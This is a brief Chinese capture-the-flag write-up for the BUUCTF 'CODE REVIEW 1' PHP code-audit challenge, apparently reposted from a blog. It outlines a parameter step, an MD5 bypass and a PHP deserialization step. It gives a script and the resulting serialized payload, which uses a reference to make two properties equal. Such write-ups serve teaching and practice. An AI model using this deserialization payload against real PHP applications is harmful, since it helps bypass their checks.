BUUCTF-CODE REVIEW 1(代码审计)

  0、打开靶机后,是php源码

  1、第一层是GET,POST传参
  2、第二层md5绕过
  3、第三层是php反序列

 1 <?php
 2 class BUU{
 3     public $correct="";
 4     public $input="";
 5 }
 6 
 7 $obj= new BUU;
 8 $obj->input=&$obj->correct;
 9 echo serialize($obj);
10 ?>

  得到的字符串:

  O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

  4、放postman。

原文地址:https://www.cnblogs.com/wrnan/p/12497272.html